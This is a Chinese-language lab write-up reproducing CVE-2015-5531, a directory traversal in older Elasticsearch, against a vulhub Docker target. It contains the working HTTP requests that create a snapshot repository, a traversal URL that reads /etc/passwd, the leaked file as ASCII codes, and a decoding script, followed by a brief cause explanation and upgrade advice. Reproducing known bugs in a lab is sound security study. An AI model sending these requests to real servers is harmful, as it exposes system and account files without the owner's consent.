漏洞復現-CVE-2015-5531-ElasticSearch 目錄穿越
阿新 • • 發佈:2021-09-30
0x00 實驗環境
攻擊機:Win 10
靶場:docker拉的vulhub靶場
0x01 影響版本
1.6.1以下
0x02 漏洞復現
(1)訪問存在的漏洞頁面:(9200一般為ElasticSearch的常用埠)
(2)新建倉庫
PUT /_snapshot/test HTTP/1.1 Host:IP:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 110 { "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test" } }
(3)新建快照
PUT /_snapshot/test2 HTTP/1.1 Host: IP:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 128 { "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" } }
(4)訪問http://IP:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd,可讀取到伺服器的賬號資訊,是ascii編碼的,需要自行解碼,以下為解碼的指令碼:
p='114, 111, 111, 116, 58, 120, 58, 48, 58, 48, 58, 114, 111, 111, 116, 58, 47, 114, 111, 111, 116, 58, 47, 98, 105, 110, 47, 98, 97, 115, 104, 10, 100, 97, 101, 109, 111, 110, 58, 120, 58, 49, 58, 49, 58, 100, 97, 101, 109, 111, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 105, 110, 58, 120, 58, 50, 58, 50, 58, 98, 105, 110, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 115, 58, 120, 58, 51, 58, 51, 58, 115, 121, 115, 58, 47, 100, 101, 118, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 110, 99, 58, 120, 58, 52, 58, 54, 53, 53, 51, 52, 58, 115, 121, 110, 99, 58, 47, 98, 105, 110, 58, 47, 98, 105, 110, 47, 115, 121, 110, 99, 10, 103, 97, 109, 101, 115, 58, 120, 58, 53, 58, 54, 48, 58, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 110, 58, 120, 58, 54, 58, 49, 50, 58, 109, 97, 110, 58, 47, 118, 97, 114, 47, 99, 97, 99, 104, 101, 47, 109, 97, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 112, 58, 120, 58, 55, 58, 55, 58, 108, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 108, 112, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 105, 108, 58, 120, 58, 56, 58, 56, 58, 109, 97, 105, 108, 58, 47, 118, 97, 114, 47, 109, 97, 105, 108, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 101, 119, 115, 58, 120, 58, 57, 58, 57, 58, 110, 101, 119, 115, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 110, 101, 119, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 117, 117, 99, 112, 58, 120, 58, 49, 48, 58, 49, 48, 58, 117, 117, 99, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 117, 117, 99, 112, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 112, 114, 111, 120, 121, 58, 120, 58, 49, 51, 58, 49, 51, 58, 112, 114, 111, 120, 121, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 119, 119, 119, 45, 100, 97, 116, 97, 58, 120, 58, 51, 51, 58, 51, 51, 58, 119, 119, 119, 45, 100, 97, 116, 97, 58, 47, 118, 97, 114, 47, 119, 119, 119, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 97, 99, 107, 117, 112, 58, 120, 58, 51, 52, 58, 51, 52, 58, 98, 97, 99, 107, 117, 112, 58, 47, 118, 97, 114, 47, 98, 97, 99, 107, 117, 112, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 105, 115, 116, 58, 120, 58, 51, 56, 58, 51, 56, 58, 77, 97, 105, 108, 105, 110, 103, 32, 76, 105, 115, 116, 32, 77, 97, 110, 97, 103, 101, 114, 58, 47, 118, 97, 114, 47, 108, 105, 115, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 105, 114, 99, 58, 120, 58, 51, 57, 58, 51, 57, 58, 105, 114, 99, 100, 58, 47, 118, 97, 114, 47, 114, 117, 110, 47, 105, 114, 99, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 103, 110, 97, 116, 115, 58, 120, 58, 52, 49, 58, 52, 49, 58, 71, 110, 97, 116, 115, 32, 66, 117, 103, 45, 82, 101, 112, 111, 114, 116, 105, 110, 103, 32, 83, 121, 115, 116, 101, 109, 32, 40, 97, 100, 109, 105, 110, 41, 58, 47, 118, 97, 114, 47, 108, 105, 98, 47, 103, 110, 97, 116, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 111, 98, 111, 100, 121, 58, 120, 58, 54, 53, 53, 51, 52, 58, 54, 53, 53, 51, 52, 58, 110, 111, 98, 111, 100, 121, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 95, 97, 112, 116, 58, 120, 58, 49, 48, 48, 58, 54, 53, 53, 51, 52, 58, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 98, 105, 110, 47, 102, 97, 108, 115, 101, 10' q=p.replace(',','') #將數值中間的/替換為, list = q.split(" ") #將字串轉換為列表 list2=[] for i in list: x=int(i) str = chr(x) list2.append(str) #將列表裡的int型的ascii數值轉換為字串型別並加入至空列表內 print(list2) ss=''.join(list2) #將列表轉換為字串 print(ss)
POC的話自己去找吧,這個我覺得還是發包解碼好很多。
String.fromCharCode(98)在瀏覽器的console執行也可以轉換:
0x03 漏洞原理
找了半天沒找到漏洞原理,寫個大概的吧:
1.5.1及以前,無需任何配置即可觸發該漏洞。之後的新版,配置檔案elasticsearch.yml中必須存在path.repo,該配置值為一個目錄,且該目錄必須可寫,等於限制了備份倉庫的根位置。不配置該值,預設不啟動這個功能。
0x04 修復建議
1、升級版本
2、將repo目錄許可權設定為僅可讀,不可寫(自己建議的,僅在不影響業務的前提下)
0x05 參考文獻
https://www.cnblogs.com/qianxiao996/p/13574645.html
0x06 免責宣告
本漏洞復現文章僅用於學習、工作與興趣愛好,並立志為網路安全奉獻一份力量,凡是利用本部落格相關內容的無良hackers造成的安全事故均與本人無關!